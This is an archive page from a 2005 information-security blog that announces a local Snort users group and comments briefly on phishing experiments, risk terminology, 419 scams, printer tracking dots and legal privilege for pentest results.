Update 2005-11-28 09:48 -- Check out Richard Carrigan's website for more information on his idea. There's a presentation and a copy of his paper on the subject.

Sunday, November 27, 2005

HRSUG Meeting Reminder

Just a reminder that the inaugural meeting of the Hampton Roads Snort Users Group (HRSUG) is just around the corner! Read the meeting details, then join the mailing list!

Thursday, November 10, 2005

HRSUG Mailing List

As you may know, I recently announced the formation of a new Snort users' group in the Hampton Roads, VA area. I'm happy to say that the group's mailing list is now available. If you want to be kept up to date on our meeting schedule, or if you just want to connect with other security people in the area, sign up now!

Wednesday, November 09, 2005

RSA: Phishing experiments hook net users

Here's a nifty RSA press release describing a recent experiment they conducted in NYC. Experimenters posed as tourism pollsters and in most cases were able to gather enough information from their subjects to divine possible passwords they might use for their various accounts. Oddly, most people wouldn't give out their password itself, or the method by which they come up with new passwords.

The article points out that the most likely explanation is that most people just aren't aware of how other personal information can be used as "back doors" (e.g., by using the mother's maiden name to reset "forgotten" passwords). I'm kind of at a loss on this one. Who hasn't had to set up a security question for this purpose? Are people setting these up and forgetting about them, or maybe blindly answering the questions without understanding the purpose of collecting the information?

Here's what I'd like to do. I'd love to repeat this experiment, with a twist. At the end of each interview, hand the person a scorecard telling them how well they protected their information, and providing suggestions for improvement. Be sure to give examples of how each piece of requested information could have been used against them. That way you gather results and educate the public at the same time.

Friday, October 28, 2005

Open source exploit programming tools for Windows

Michael Boman has just posted a short article in which he details some open source tools he uses for "exploit engineering" on the Windows platform. I'm not as familiar with the Windows development tools as I am with their Unix counterparts, but I might have to try some of these myself.

Apparently more articles in this series are under development.

Thursday, October 27, 2005

Hampton Roads Snort Users Group

As some of you know, I've been wanting to meet more infosec pros in my local area (sounds like the beginning of a 900 number ad). I started by volunteering as a SANS Local Mentor, and that worked very well, but now I'm going to take the next step.

I've been working with the fine folks at Sourcefire to help me create a local Snort Users Group, and I'm finally ready to announce our first meeting!


Date: 1 Dec 2005
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040
Meeting room B

The speaker for our inaugural meeting will be Sourcefire's Jason Brvenik, who will fill us in on the new target-based IDS technology that they are incorporating into the open source Snort code.

By the way, don't let the group's name fool you. Even if you're not interested in Snort itself, please consider attending anyway. Most Snort user groups cover a variety of security-related topics, and that's what I want for this one, too. So if you want to meet some of your peers in an informal setting and learn about some of the newest happenings in the security world, HRSUG is for you!

Please pass the word, and contact me (david vorant com) if you'd like any more information.

Monday, October 24, 2005

Risks vs. Vulnerabilities vs. Threats

My experience tells me that a lot of people are still confused over the differences between risks, threats and vulnerabilities. In fact, even security pros (who should know better) often find themselves misusing the terms in casual conversation. The following simple analogy may help clarify the situation:

Imagine that you are going on a trip. While packing your suitcase, you realize that you need to bring some shampoo. Your shampoo has a flip top, not a screw top, and so you're concerned that if you pack your bag too full, the airport baggage handlers might treat your bag roughly, exerting excess pressure on the bottle and popping the top. Shampoo could spurt all over your stuff!

In this scenario, you have a vulnerability (the flip top shampoo bottle which might not survive a good squeeze). The threat is that baggage handlers are not known for being gentle. The risk is that your clothes might get doused with shampoo.

Change any one of these conditions and you don't have anything to worry about. If you remove the vulnerability by taking a screw top bottle instead, your clothes will be fine because even the baggage monkeys can't rupture a properly made bottle (you hope). Similarly, if you decide to carry your luggage on, you can probably avoid the baggage handlers altogether, and you will naturally be more careful with your own bag.

While we're on the subject, let's carry the analogy a bit further and talk about countermeasures. There are four basic types of countermeasures: Preventative, Reactive, Detective and Administrative. Preventative countermeasures work by keeping something from happening in the first place. In the example above, enclosing the bottle in a rigid plastic box would certainly help keep it from being crushed, and would count as a preventative countermeasure.

A reactive countermeasure comes into play after an event has already occurred. If you arrived at your hotel and found that your clothes were, in fact, covered with goo, you could make use of the hotel's laundry to correct the problem. This would be an example of a reactive countermeasure.

I can't really think of a realistic example of a detective countermeasure here (a shampoo-sniffing dog?). Finally, an administrative countermeasure uses policy to protect an asset. In this case, you could attempt to avoid the situation by making it your policy to rely on the hotel's shampoo, thus removing your need to bring your own.

I hope this has made things a little more clear. It is the combination of the vulnerability (the flip top shampoo bottle) and the threat (baggage monkeys at the airport) that creates a risk (to the clothes). You can attempt to use various countermeasures to bring the risk down to acceptable levels, or you could simply accept the risk and move on.

Of course, as I am a devious person, I might choose to take a different option. I can always transfer the risk by packing the shampoo in my wife's bag. I'll leave you to do your own risk analysis for that one...

Friday, October 21, 2005

Why 419?

The Los Angeles Times is running a great behind-the-scenes story on Nigerian 419 scams, entitled I Will Eat Your Dollars. I think this is the best thing I've ever read on the subject, as it follows an actual scammer in Lagos. The story goes into detail on how the scammer, Stephen (19 years old), got into the business and why it was so attractive to him and his colleagues. If you have any interest at all in the subject, you really should read this article.

Monday, October 17, 2005

What your printer is telling the world about you.

The Electronic Frontier Foundation has published a short but extremely disturbing release in which they describe the secret watermarks your color laser printer could be placing on all your printed pages. Apparently the Secret Service has negotiated the inclusion of these watermarks (in the form of patterns of yellow dots) on printers from a variety of manufacturers. This page contains a more technical explanation of how to see these little yellow dots and what they mean. There's also an interactive form you can use to submit your own dot pattern for decoding.

I've said that I find this very disturbing, and here's why: the government has neither the right nor the legitimate need to track arbitrary documents printed by its citizens. Frankly, this is the sort of thing I expect to hear about China, not the US.

Thursday, October 06, 2005

Attorney-client privilege for pentest results

What an interesting idea. This article's thesis is that pentest results can potentially be used against the company that ordered the test. In court, opposing counsel could use them to argue that the company failed to exercise due diligence in protecting its assets.

The solution? Have your attorney arrange the pentest, and then the results will be covered under attorney-client privilege.

This is kind of a neat legal "hack", but it's kinda sad that it could be necessary. Pentests are all about exercising due diligence, not ignoring it. At least, they are if the company properly follows through on the findings, which is not always the case. So if you're planning to ignore the results of your next test, read this article.